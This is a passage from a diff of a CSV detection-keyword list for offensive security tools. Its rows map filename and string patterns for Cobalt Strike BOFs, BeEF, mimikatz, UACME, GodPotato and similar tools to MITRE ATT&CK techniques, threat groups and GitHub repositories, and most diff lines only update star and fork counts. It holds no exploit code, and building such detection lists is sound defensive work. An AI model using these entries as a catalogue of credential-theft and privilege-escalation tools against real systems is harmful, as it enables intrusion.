TA0002","N/A","N/A","C2","https://github.com/1N73LL1G3NC3x/Nightmangle","1","0","N/A","10","10","73","10","2023-09-26T19:21:31Z","2023-09-26T18:25:23Z" "*BeaconJob.cs*","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z" "*BeaconJobWriter.cs*","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z" "*beaconlogs.json*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" @@ -7721,28 +7867,28 @@ "*BeaconPrintToStreamW*","offensive_tool_keyword","cobaltstrike","A Beacon Object File (BOF) for Cobalt Strike which uses direct system calls to enable WDigest credential caching.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/WdToggle","1","1","N/A","10","10","217","32","2023-05-03T19:51:43Z","2020-12-23T13:42:25Z" "*BeaconSpawnTemporaryProcess*","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","1","N/A","10","10","475","115","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" "*BeaconSpawnTemporaryProcess*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" -"*BeaconTool -*","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/darkr4y/geacon","1","0","N/A","10","10","1038","224","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z" -"*BeaconTool/lib/sleep.jar*","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/darkr4y/geacon","1","1","N/A","10","10","1038","224","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z" +"*BeaconTool -*","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/darkr4y/geacon","1","0","N/A","10","10","1038","225","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z" +"*BeaconTool/lib/sleep.jar*","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/darkr4y/geacon","1","1","N/A","10","10","1038","225","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z" "*BeaconUseToken*","offensive_tool_keyword","cobaltstrike","Dumping SAM / SECURITY / SYSTEM registry hives with a Beacon Object File","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EncodeGroup/BOF-RegSave","1","1","N/A","10","10","171","29","2020-10-08T17:29:02Z","2020-10-07T13:46:03Z" "*beb285e40caf95bcc1552fc293194fa29275e3cdb9c62ef752b62257f6480aaf*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" -"*beb7d48597345d0109ce51c7452292ba6e970eb8ed5f716ec035087aa3f045b3*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*beef:beef*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","0","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" -"*beef_bind_tcp-stage.asm*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" -"*beef_bind_tcp-stager.asm*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" -"*beef_bind-stage*.rb*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" -"*beef_bind-stage.asm*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" -"*beef_bind-stager.asm*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" -"*beef_test.rb*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","0","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" -"*beefproject*","offensive_tool_keyword","beef","The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1210 - T1216 - T1207 - T1189 - T1190 - T1566","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" -"*beef-xss*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*beb7d48597345d0109ce51c7452292ba6e970eb8ed5f716ec035087aa3f045b3*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*beef:beef*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","0","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*beef_bind_tcp-stage.asm*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*beef_bind_tcp-stager.asm*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*beef_bind-stage*.rb*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*beef_bind-stage.asm*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*beef_bind-stager.asm*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*beef_test.rb*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","0","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*beefproject*","offensive_tool_keyword","beef","The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1210 - T1216 - T1207 - T1189 - T1190 - T1566","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*beef-xss*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" "*Beelogger*","offensive_tool_keyword","BeeLogger","Keylogger generator. fake office and acrobat file and malicious executables generator","T1056 - T1105 - T1204 - T1106","TA0003 - TA0004 - TA0007","N/A","N/A","Exploitation tools","https://github.com/4w4k3/BeeLogger","1","1","N/A","N/A","10","902","343","2022-12-02T19:42:41Z","2017-02-17T15:34:39Z" "*BeetleChunks/SpoolSploit*","offensive_tool_keyword","spoolsploit","A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.","T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/BeetleChunks/SpoolSploit","1","1","N/A","N/A","6","533","90","2021-07-16T04:49:43Z","2021-07-07T00:32:28Z" "*before-create-implant-callback*","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" "*before-create-implant-io-bin*","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" "*before-find-implant-chunks*","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" -"*BeichenDream/GodPotato*","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1055.012 - T1053.005 - T1047","TA0005 - TA0002 - TA0008","N/A","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","1","N/A","N/A","10","1186","179","2023-06-25T05:20:26Z","2022-12-23T14:37:00Z" +"*BeichenDream/GodPotato*","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1055.012 - T1053.005 - T1047","TA0005 - TA0002 - TA0008","N/A","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","1","N/A","N/A","10","1192","179","2023-06-25T05:20:26Z","2022-12-23T14:37:00Z" "*BeichenDream/SharpToken*","offensive_tool_keyword","SharpToken","SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them","T1134 - T1101 - T1214 - T1087 - T1038","TA0004 - TA0007","N/A","N/A","Exploitation tools","https://github.com/BeichenDream/SharpToken","1","1","N/A","N/A","4","353","47","2023-04-11T13:29:23Z","2022-06-30T07:34:57Z" -"*benjamin@gentilkiwi.com*","offensive_tool_keyword","mimikatz","mimikatz default strings","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*benjamin@gentilkiwi.com*","offensive_tool_keyword","mimikatz","mimikatz default strings","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" "*BeRoot*","offensive_tool_keyword","BeRoot","BeRoot Project is a post exploitation tool to check common misconfigurations to find a way to escalate our privilege.","T1068 - T1548 - T1574","TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/AlessandroZ/BeRoot","1","0","N/A","N/A","10","2262","488","2022-02-08T10:30:38Z","2017-04-14T12:47:31Z" "*beRoot.exe*","offensive_tool_keyword","BeRoot","Privilege Escalation Project - Windows / Linux / Mac ","T1053.005 - T1069.002 - T1069.001 - T1053.003 - T1087.001 - T1087.002 - T1082 - T1135 - T1049 - T1007","TA0007 - TA0003 - TA0002 - TA0009 - TA0040 - TA0010","N/A","N/A","Privilege Escalation","https://github.com/AlessandroZ/BeRoot","1","1","N/A","N/A","10","2262","488","2022-02-08T10:30:38Z","2017-04-14T12:47:31Z" "*beroot.py -*","offensive_tool_keyword","BeRoot","Privilege Escalation Project - Windows / Linux / Mac ","T1053.005 - T1069.002 - T1069.001 - T1053.003 - T1087.001 - T1087.002 - T1082 - T1135 - T1049 - T1007","TA0007 - TA0003 - TA0002 - TA0009 - TA0040 - TA0010","N/A","N/A","Privilege Escalation","https://github.com/AlessandroZ/BeRoot","1","0","N/A","N/A","10","2262","488","2022-02-08T10:30:38Z","2017-04-14T12:47:31Z" @@ -7751,25 +7897,25 @@ "*berzerk0*","offensive_tool_keyword","Github Username","github username known for repos on passwords exploitation and offensive tools","N/A","N/A","N/A","N/A","Credential Access","https://github.com/berzerk0","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*BesoToken.exe list*","offensive_tool_keyword","BesoToken","A tool to Impersonate logged on users without touching LSASS (Including non-Interactive sessions).","T1134 - T1003.002","TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/OmriBaso/BesoToken","1","0","N/A","10","1","91","11","2022-11-23T10:45:07Z","2022-11-21T01:07:51Z" "*BesoToken-master*","offensive_tool_keyword","BesoToken","A tool to Impersonate logged on users without touching LSASS (Including non-Interactive sessions).","T1134 - T1003.002","TA0004 - TA0006","N/A","N/A","Credential 